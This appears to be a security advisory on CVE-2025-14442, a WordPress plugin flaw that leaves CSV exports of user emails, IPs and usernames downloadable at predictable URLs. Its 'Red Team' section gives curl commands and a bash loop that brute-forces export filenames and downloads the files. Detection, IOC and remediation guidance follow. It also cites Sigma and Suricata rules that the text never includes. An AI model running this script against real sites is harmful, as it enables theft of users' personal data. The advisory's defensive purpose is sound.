CVE-2025-14442
Executive Summary
CVE-2025-14442 exposes a critical information disclosure vulnerability in the WordPress plugin "Secure Copy Content Protection and Content Locking" (versions up to and including 4.9.2). The plugin stores exported CSV files containing sensitive user data (emails, IP addresses, usernames, roles, location data) in a publicly accessible directory (/wp-content/uploads/secure-copy-content-protection/ or similar) with predictable filenames. An unauthenticated attacker can enumerate and download these files, leading to a significant breach of user privacy and potential follow-on attacks (phishing, credential stuffing, account takeover).
This vulnerability is particularly dangerous because it requires no authentication, no user interaction, and the data is stored in a well-known location with easily guessable filenames (e.g., export-YYYY-MM-DD.csv). The EPSS score of 0.0% suggests low exploitation likelihood at the time of analysis, but the public nature of the vulnerability and the ease of exploitation make it a high-priority target for automated scanning.

WordPress Ecosystem Impact
This vulnerability is specific to the WordPress plugin ecosystem. The plugin's failure to restrict access to exported CSV files is a direct violation of WordPress security best practices. The data exposed is typically used for user analytics and content locking, making it a goldmine for attackers targeting site administrators and users.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – Exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – No authentication needed.
- User Interaction (UI): None (N) – No user action required.
- Scope (S): Unchanged (U) – The vulnerable component and the impacted component are the same.
- Confidentiality (C): Low (L) – Only specific data (CSV exports) is exposed, not the entire database.
- Integrity (I): None (N) – No data modification possible.
- Availability (A): None (N) – No denial of service.
Threat Level: Medium (5.3). The low confidentiality impact is due to the limited scope of exposed data, but the ease of exploitation and the sensitivity of the data (emails, IPs, usernames) elevate the real-world risk.
Deep Dive & Mechanics
The vulnerability stems from the plugin's export functionality. When an administrator exports user data (e.g., for content locking analytics), the plugin generates a CSV file and stores it in the WordPress uploads directory. The filename is predictable, often based on the date (e.g., export-2025-03-15.csv). The directory is publicly accessible via the web server.
Attack Flow:
- Attacker identifies a target WordPress site running the vulnerable plugin.
- Attacker enumerates the uploads directory structure:
https://target.com/wp-content/uploads/secure-copy-content-protection/. - Attacker attempts to access files with predictable names:
export-2025-03-15.csv,export-2025-03-14.csv, etc. - If the file exists, the attacker downloads it and extracts sensitive user data.
Why it works:
- The plugin does not use
.htaccessorweb.configfiles to deny direct access to the uploads subdirectory. - The filenames are not randomized or hashed.
- No authentication check is performed before serving the file.
Vulnerable vs. Patched Code
Since no official patch is available, we analyze the vulnerable code pattern and propose a fix.
Vulnerable Code (Conceptual):
// In the plugin's export function
$upload_dir = wp_upload_dir();
$csv_file = $upload_dir['basedir'] . '/secure-copy-content-protection/export-' . date('Y-m-d') . '.csv';
// ... write data to $csv_file ...
// No access control applied
Patched Code (Conceptual):
// In the plugin's export function
$upload_dir = wp_upload_dir();
$csv_file = $upload_dir['basedir'] . '/secure-copy-content-protection/export-' . wp_hash( date('Y-m-d') . NONCE_SALT ) . '.csv';
// ... write data to $csv_file ...
// Add .htaccess to deny direct access
file_put_contents( $upload_dir['basedir'] . '/secure-copy-content-protection/.htaccess', 'Deny from all' );
Key Changes:
- Use
wp_hash()to generate a non-predictable filename. - Create a
.htaccessfile to block direct access to the directory. - Alternatively, serve the file via a PHP download script that checks user capabilities.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- A WordPress site with the vulnerable plugin installed and activated.
- The plugin must have been used to export data at least once.
Exploitation Steps:
Enumerate the uploads directory:
curl -s -o /dev/null -w "%{http_code}" "https://target.com/wp-content/uploads/secure-copy-content-protection/"If the directory listing is enabled, you'll see the files. If not, proceed with brute-forcing.
Brute-force predictable filenames:
#!/bin/bash for date in $(seq -w 1 31); do for month in $(seq -w 1 12); do for year in 2024 2025; do url="https://target.com/wp-content/uploads/secure-copy-content-protection/export-${year}-${month}-${date}.csv" response=$(curl -s -o /dev/null -w "%{http_code}" "$url") if [ "$response" == "200" ]; then echo "Found: $url" curl -s "$url" -o "export-${year}-${month}-${date}.csv" fi done done doneExtract data:
cat export-*.csv | head -n 20
Expected Output:
ID,Email,IP Address,Username,Role,Location
1,user@example.com,192.168.1.1,john_doe,subscriber,New York
2,admin@example.com,10.0.0.1,admin,administrator,London
Blue Team (Detection & Hardening)
Detection:
- Monitor web server logs for requests to
/wp-content/uploads/secure-copy-content-protection/export-*.csv. - Alert on multiple 200 responses from this path within a short time window.
Hardening:
- Immediate: Delete all existing CSV files from the uploads directory.
- Temporary: Add an
.htaccessfile to the directory:# /wp-content/uploads/secure-copy-content-protection/.htaccess Deny from all - Permanent: Disable the export functionality until the vendor releases a patch. Alternatively, modify the plugin code to use a non-predictable filename and serve files via a PHP script with capability checks.
Indicators of Compromise (IOCs)
File-Based IOCs:
export-*.csvfiles in/wp-content/uploads/secure-copy-content-protection/.htaccessfile missing from the same directory
Network IOCs:
- HTTP GET requests to
/wp-content/uploads/secure-copy-content-protection/export-*.csv - User-Agent strings indicating automated scanning (e.g.,
curl,python-requests,Go-http-client)
Log IOCs:
- Web server access logs showing 200 responses for CSV files in the vulnerable path
- Multiple 404 responses followed by a 200 (indicating brute-forcing)

Remediation & Mitigation
Immediate Actions:
- Delete all existing CSV files from
/wp-content/uploads/secure-copy-content-protection/. - Add an
.htaccessfile to the directory withDeny from all. - Disable the export functionality in the plugin settings until a patch is available.
Long-Term Fix:
- Vendor Patch: Await an official update from Wpexperts that implements proper access controls and randomized filenames.
- Custom Patch: If you have developer resources, apply the patched code described in the "Vulnerable vs. Patched Code" section.
- Alternative Plugin: Consider switching to a different content protection plugin that follows security best practices.
Monitoring:
- Implement the Sigma and Suricata rules above to detect exploitation attempts.
- Review web server logs for any unauthorized access to the vulnerable path.
